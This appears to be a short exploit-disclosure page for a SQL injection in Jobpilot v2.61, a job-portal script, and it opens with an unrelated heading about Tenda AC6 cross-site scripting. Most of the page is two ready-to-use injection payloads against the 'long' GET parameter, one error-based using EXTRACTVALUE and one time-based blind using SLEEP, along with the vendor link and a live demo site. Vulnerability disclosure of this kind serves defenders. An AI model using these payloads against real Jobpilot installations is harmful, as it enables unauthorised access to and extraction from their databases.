Tenda AC6 AC1200 15.03.06.50_multi Cross Site Scripting

Jobpilot version 2.61 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Jobpilot v2.61 - SQL Injection# Date: 2023-06-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822# Demo Site: https://jobpilot.templatecookie.com# Tested on: Kali Linux# CVE: N/A----- PoC: SQLi -----Parameter: long (GET)    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT(ELT(4894=4894,1))),0x71786b7171)) AND(1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CALFire Contract Counties, California, UnitedStates&category=&price_min=&price_max=&tag=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND(1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CALFire Contract Counties, California, UnitedStates&category=&price_min=&price_max=&tag=

Tag

#linux